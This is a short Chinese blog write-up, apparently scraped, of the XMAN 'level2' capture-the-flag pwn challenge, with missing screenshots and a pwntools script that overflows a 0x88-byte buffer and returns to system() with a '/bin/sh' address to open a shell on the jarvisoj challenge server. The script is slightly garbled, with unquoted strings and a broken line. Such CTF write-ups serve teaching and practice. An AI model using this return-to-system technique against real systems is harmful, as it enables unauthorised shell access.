1. 程式人生 > >[XMAN]level2

[XMAN]level2

address end image soj interact ima bubuko cti div

技術分享圖片

老套路

checksec

技術分享圖片

ida查看

技術分享圖片

技術分享圖片

覆蓋掉

之後system地址再返回覆蓋 最後/bin/sh地址

# -*- coding:utf-8 -*-

from pwn import *


sh = remote(pwn2.jarvisoj.com, 9878)  # remote


junk = a * 0x88 

fakebp = a*4

sh_address = 0x0804A024  # /bin/sh

sys_address = 0x08048320


payload = junk + fakebp + p32(sys_address)+
aaaa+p32(sh_address) sh.send(payload) sh.interactive()

[XMAN]level2